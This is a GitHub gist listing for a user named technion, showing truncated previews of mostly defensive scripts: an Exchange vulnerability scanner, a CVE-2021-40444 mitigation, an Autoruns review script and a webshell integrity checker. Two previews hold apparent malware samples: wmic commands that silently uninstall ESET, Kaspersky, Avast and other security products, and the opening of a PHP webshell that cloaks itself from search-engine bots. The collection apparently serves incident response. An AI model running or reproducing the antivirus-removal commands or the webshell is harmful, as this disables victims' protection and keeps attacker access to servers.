Joshua Small technion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-StrictMode -Version 2 | |
| # Connect first | |
| # Connect-AzureAD | |
| function Get-LicencesforUser | |
| { | |
| param([object]$user) | |
| # $user should be populated with | |
| # $user = Get-AzureADUser -ObjectId [email protected] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $v='ipc'; | |
| cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive | |
| cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
technion
/ AutorunsVT.ps1
Created
April 23, 2021 01:05
Review CSV file from autorunsc.exe a and handle Virustotal detections
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $autorunsCsv = "\AutorunsOutput.csv" | |
| $autorunsArray = Import-Csv $autorunsCsv | |
| Foreach ($item in $autorunsArray) { | |
| $detection = $item.'VT detection' | |
| if ($detection -eq "" -or $detection -eq 'Unknown') { | |
| continue | |
| } | |
| Write-Output $detection |
technion
/ CVE-2021-40444Mit.ps1
Last active
September 12, 2021 08:43
CVE-2021-40444 Mitigation Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-Strictmode -Version 2 | |
| # Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 | |
| # Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section | |
| for($i = 0; $i -le 3; $i++) { | |
| $RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i" | |
| if (-not (Test-Path $RegPath)) { | |
| New-Item $RegPath -Force | |
| } |
technion
/ Exchange Version.nse
Created
November 17, 2021 22:50
Scan Microsoft Exchange Version for vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local http = require "http" | |
| local shortport = require "shortport" | |
| local stdnse = require "stdnse" | |
| local table = require "table" | |
| local string = require "string" | |
| author = {"[email protected]"} | |
| license = "Same as Nmap--See https://nmap.org/book/man-legal.html" | |
| categories = {"discovery", "safe"} | |
| -- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}} | |
| if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']'); | |
| if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']'); | |
| if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']'); |
technion
/ ExchangeIntegrity.ps1
Created
November 15, 2022 23:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Exchange IIS Server Integrity Check | |
| Identify common webshells and backdoors associated with compromises | |
| Usage: | |
| Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates | |
| Write-IntegrityFile [ -hashfile "filename.json" ] |
OlderNewer